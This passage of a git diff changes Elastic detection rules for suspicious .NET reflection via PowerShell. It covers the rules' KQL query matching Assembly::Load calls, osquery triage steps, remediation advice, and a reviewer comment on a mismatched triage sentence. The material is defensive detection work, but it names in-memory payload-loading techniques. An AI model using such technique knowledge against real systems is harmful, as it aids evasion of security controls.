start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load"
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json
index fa0f5006fe0..dbba1ffb1f4 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_108.json
@@ -12,7 +12,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Suspicious .NET Reflection via PowerShell",
- "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load"
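Review bot: The investigation step `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.` in the new `note` does not fit this rule, whose `query` keys on `powershell.file.script_block_text` and involves no registry change; the phrase appears to be carried over from a registry-focused guide. The same sentence is in the -12 hunks for `_109.json` and `_110.json` below. Since this file is generated, the fix belongs in the upstream rule source, for example `... to the target host around the time the script block was executed.`.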
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json
index 6fcbe44e589..b81298e71fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json
@@ -12,7 +12,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Suspicious .NET Reflection via PowerShell",
- "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load"
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json
index 4cc5f05d1db..298d78556d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
